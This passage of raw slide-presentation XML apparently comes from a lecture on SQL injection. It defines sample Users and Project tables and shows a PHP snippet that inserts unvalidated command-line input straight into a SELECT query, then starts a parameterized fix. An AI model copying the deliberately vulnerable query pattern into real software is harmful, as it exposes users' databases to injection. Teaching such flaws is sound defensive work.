            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="Shape 521"/>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530" name="Shape 53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Shape 53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538" name="Shape 53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539" name="Shape 53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549" name="Shape 54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550" name="Shape 55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Shape 560"/>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indent="-317500" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>example table for these queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Show how $name is set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>explain how WHERE works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>create table Users(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  name varchar(30),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  age int,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  address varchar(50),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  salary int,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  pnum int</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>create table Project(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  pnumber int,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  pname varchar(30),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  plocation varchar(50)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Shape 561"/>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26" name="Shape 12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Shape 567"/>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568" name="Shape 568"/>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569" name="Shape 569"/>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Shape 576"/>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rPr lang="en-US"/>
              <a:t>question for the audience</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="Shape 577"/>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Shape 584"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Shape 585"/>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Shape 592"/>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rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>$ is prefixed to names to define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>variables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="252525"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0000BB"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>// beware, no input validation!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$query  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>"SELECT * FROM Users WHERE name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>‘$name’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$result </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>pg_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$conn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="007700"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0000BB"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FEFEFE"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>No matter what is passed into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F2F4"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FEFEFE"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> variables here, the structure of the SQL query cannot be changed by an attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="111111"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FEFEFE"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="111111"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FEFEFE"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="0000BB"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$query = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="DD0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>“SELECT * FROM Users WHERE name = ?"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>$stmt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
